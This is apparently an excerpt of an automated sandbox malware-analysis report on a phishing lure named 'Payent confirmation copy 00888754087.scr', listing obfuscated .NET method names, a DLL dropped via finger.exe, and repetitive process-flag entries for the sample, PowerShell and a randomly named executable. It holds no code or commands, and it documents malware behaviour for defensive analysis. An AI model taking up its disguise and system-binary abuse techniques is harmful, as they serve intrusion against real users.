Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, QE5OneWd920YCRlW4g.cs	High entropy of concatenated method names: 'N7L3bh76XB', 'jYv3vs1yKD', 'rji3locMM5', 'pwM3DQ1gi3', 'lnM3GXMb6n', 'aiq3c3unL2', 'xHRENDytCIP9tFj3Ja', 'RWPXjyEHkXw3d58QGm', 'A0e33CNsxb', 'NKd3d1rIWu'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, FPx2LFNdTv2kEAw824.cs	High entropy of concatenated method names: 'tGKbVo0Kv9', 'loXbxePUbi', 'AVxbQ0gUgn', 'ffPQgATI7J', 'S2bQzjFGFF', 'm0IbYNZxl6', 'ChMb3NQ6QL', 'yvFbJucTnx', 'cvubdQtUwJ', 'xJjboCSjLT'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, Ac7xW4lpX9vRqwB4M6.cs	High entropy of concatenated method names: 'bYYxXRFENM', 'RM6xS4qhqO', 'D5CxCi3X5d', 'wc6xRMFT2x', 'zGlxG1AU1G', 'zUnxcq0Bvt', 'oJNx4rcAES', 'NfixHXbA6h', 'xsyx9wo0t9', 'xD6xtGgpod'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, dxEJ4JRcDccomymNei.cs	High entropy of concatenated method names: 'qsGtxfD4sR', 'HGrtnkKNqb', 'iMEtQUfFdi', 'ge5tbNPT8t', 'WIgt9AGYr6', 'zVwtvSckYf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, GT0LXboupvvgGrnSAd.cs	High entropy of concatenated method names: 'FBFb7VEnng', 'yo9b68shdp', 'wLMb2k2OQo', 'SjCbX1SiOj', 'OuCbhTXv61', 'n9CbSqwMDD', 'CHhbpcV2Mh', 'GZ4bCKB3Tw', 'LjCbRW0G09', 'HJxbNJ8rpu'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, CZ3ugisWcyJYvmGu4he.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd3TF9pTkof', 'YS6FtQxEPM', 'D4PFLE7sdd', 'REmFFYRtJH', 'pRBFm04E65', 'JrlFZcr0qs', 'wl9FKMdsBE'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, p7jRKTZMejsJHeifIa.cs	High entropy of concatenated method names: 'xM24wmRAFv', 'QCj4gtaW9T', 'SeNHYhRYHV', 'doYH3VM7L4', 'bgT4e2v2Oe', 'Cc04jemCpq', 'roJ4E5JWJW', 'HUV4U2VAYx', 'fHv4PFnImL', 'VIA4BPpb61'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, EJ1ZyShAMUg15nQSfH.cs	High entropy of concatenated method names: 'Hmr2HFMTe', 'IqNX3OcBH', 'NBeS1LGiJ', 'TOMpxRbML', 'tLrRefH9U', 'o8jNScjqM', 'VRmNTr9wBSgHXMV7dF', 'KAyhyiXBpXimJnGXqf', 'T0kHE5jhw', 'VgftC2ZZG'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, Qh4VL4BqVBJ9QadaTR.cs	High entropy of concatenated method names: 'pR7nhZOgVQ', 'o8wnpkR2EF', 'mGbxsytUZ5', 'WFfxixkIYS', 'bUmxOynAXM', 'DQ7xfnoP0P', 'RcfxAePd03', 'GERxMLL5oQ', 'zkYxrOaG3Q', 'fuux5HaAED'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs	High entropy of concatenated method names: 'JnFWUNR6c4', 'STFWPpgN7e', 'MVJWBDIiQx', 'PISWT7Fs5O', 'LCbW15q6YI', 'EQXWuDtywd', 'xF1W0B9lYN', 'Jg2Ww1uIDG', 'kbVW88uiL1', 'h89WgeJSXA'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, x85usGnCwJnBeo8rDc.cs	High entropy of concatenated method names: 'gZMIC6XqPj', 'tgkIReoyrr', 'FvoIa8uFvu', 'CrNIqZVXJ3', 'utQIir4t6U', 'VCpIOIBoCd', 'WCXIArtjgL', 'e4SIMUsped', 'myUI5iKDu9', 'bUFIetarx2'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, rg35JuudNuuPPIfUtX.cs	High entropy of concatenated method names: 'Dispose', 'agG38UTXLa', 'ahDJqPAUtA', 'lZhF1JrQW4', 'waL3gJ6xkE', 'QhH3zxDPUe', 'ProcessDialogKey', 'aemJYptMIA', 'jRUJ3EaeDA', 'bPfJJYcU8H'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, snYq7vjt6RoVqfKG38.cs	High entropy of concatenated method names: 'zvr9a3NPuV', 'UvB9qb6srq', 'mdX9siTiD7', 'Hqw9i38FRK', 'H0g9OvDBn8', 'q4I9f1WQGe', 'MxJ9AaWCsO', 'Roe9Mg2wfq', 'DmV9rGGoTp', 'Tpy95DruYV'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, mHDMjBXdZAhCJgRv98.cs	High entropy of concatenated method names: 'zZqQkrKuOi', 'uvBQWXrxk4', 'HXrQnJM5HB', 'VwmQblhPQy', 'CltQva3dHH', 'Tn5n18cFOn', 'Dk3nuqhVMX', 'gQqn0WYeTd', 'kuQnwks0tZ', 'OrJn8Luj4K'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, APyjbyvbetLgTTfUX7.cs	High entropy of concatenated method names: 'oyy9G4rYka', 'JTP94UICWT', 'dY199liEP1', 'Hfp9LSHDLy', 'm4e9mqGE3C', 'PU89KQ9Xik', 'Dispose', 'oiaHV2XbX6', 'kiTHW8Dyme', 'GItHx75uek'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, pNd39XzPNIQr9WNHMd.cs	High entropy of concatenated method names: 'EFLtSyJiBG', 'bdPtC7rL3J', 'L74tRtBn4y', 'EWuta4rkgm', 'm9ntqB9e5w', 'thgticGRSo', 'bZ6tObvMKD', 'idgtKafOnU', 'vW1t74InP9', 'FIMt6UFtH5'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, W3xqtbssSmfMGuTvJuC.cs	High entropy of concatenated method names: 'CnttgCwOv3', 'VohtzFRGDd', 'UUsLYI9iyO', 'FKhL3YaRqC', 'yXuLJAVIui', 'Yg9LdxPUxL', 'AhuLo4vnxn', 'bmYLkgm6Rk', 't3JLVOtWrf', 'aQxLW8UBMn'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, efV8jdshvdLqdLIF0VS.cs	High entropy of concatenated method names: 'ToString', 'iElLCEHUA1', 'zeBLR5VhFg', 'shxLNlnAGt', 'NYPLanXipe', 'i8iLqTZGRp', 'r4ZLsvOYNU', 'b5lLiNcS0j', 'jQx6AwpKiyP9G33p797', 'XHI2JJp9YxkiwfATQZY'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	High entropy of concatenated method names: 'bRddkoH7av', 'L2idVtbWQd', 'gNZdWqma8P', 'aJRdxEUbkS', 'hDNdnvmQ4x', 'O7IdQhKCTe', 'V12dbajUP7', 'PPbdvX4XPq', 'HZndyEsBd7', 'N3EdlWxyoL'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, QE5OneWd920YCRlW4g.cs	High entropy of concatenated method names: 'N7L3bh76XB', 'jYv3vs1yKD', 'rji3locMM5', 'pwM3DQ1gi3', 'lnM3GXMb6n', 'aiq3c3unL2', 'xHRENDytCIP9tFj3Ja', 'RWPXjyEHkXw3d58QGm', 'A0e33CNsxb', 'NKd3d1rIWu'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, FPx2LFNdTv2kEAw824.cs	High entropy of concatenated method names: 'tGKbVo0Kv9', 'loXbxePUbi', 'AVxbQ0gUgn', 'ffPQgATI7J', 'S2bQzjFGFF', 'm0IbYNZxl6', 'ChMb3NQ6QL', 'yvFbJucTnx', 'cvubdQtUwJ', 'xJjboCSjLT'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, Ac7xW4lpX9vRqwB4M6.cs	High entropy of concatenated method names: 'bYYxXRFENM', 'RM6xS4qhqO', 'D5CxCi3X5d', 'wc6xRMFT2x', 'zGlxG1AU1G', 'zUnxcq0Bvt', 'oJNx4rcAES', 'NfixHXbA6h', 'xsyx9wo0t9', 'xD6xtGgpod'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, dxEJ4JRcDccomymNei.cs	High entropy of concatenated method names: 'qsGtxfD4sR', 'HGrtnkKNqb', 'iMEtQUfFdi', 'ge5tbNPT8t', 'WIgt9AGYr6', 'zVwtvSckYf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, GT0LXboupvvgGrnSAd.cs	High entropy of concatenated method names: 'FBFb7VEnng', 'yo9b68shdp', 'wLMb2k2OQo', 'SjCbX1SiOj', 'OuCbhTXv61', 'n9CbSqwMDD', 'CHhbpcV2Mh', 'GZ4bCKB3Tw', 'LjCbRW0G09', 'HJxbNJ8rpu'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, CZ3ugisWcyJYvmGu4he.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd3TF9pTkof', 'YS6FtQxEPM', 'D4PFLE7sdd', 'REmFFYRtJH', 'pRBFm04E65', 'JrlFZcr0qs', 'wl9FKMdsBE'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, p7jRKTZMejsJHeifIa.cs	High entropy of concatenated method names: 'xM24wmRAFv', 'QCj4gtaW9T', 'SeNHYhRYHV', 'doYH3VM7L4', 'bgT4e2v2Oe', 'Cc04jemCpq', 'roJ4E5JWJW', 'HUV4U2VAYx', 'fHv4PFnImL', 'VIA4BPpb61'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, EJ1ZyShAMUg15nQSfH.cs	High entropy of concatenated method names: 'Hmr2HFMTe', 'IqNX3OcBH', 'NBeS1LGiJ', 'TOMpxRbML', 'tLrRefH9U', 'o8jNScjqM', 'VRmNTr9wBSgHXMV7dF', 'KAyhyiXBpXimJnGXqf', 'T0kHE5jhw', 'VgftC2ZZG'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, Qh4VL4BqVBJ9QadaTR.cs	High entropy of concatenated method names: 'pR7nhZOgVQ', 'o8wnpkR2EF', 'mGbxsytUZ5', 'WFfxixkIYS', 'bUmxOynAXM', 'DQ7xfnoP0P', 'RcfxAePd03', 'GERxMLL5oQ', 'zkYxrOaG3Q', 'fuux5HaAED'

Drops PE files

Source: C:\Windows\SysWOW64\finger.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
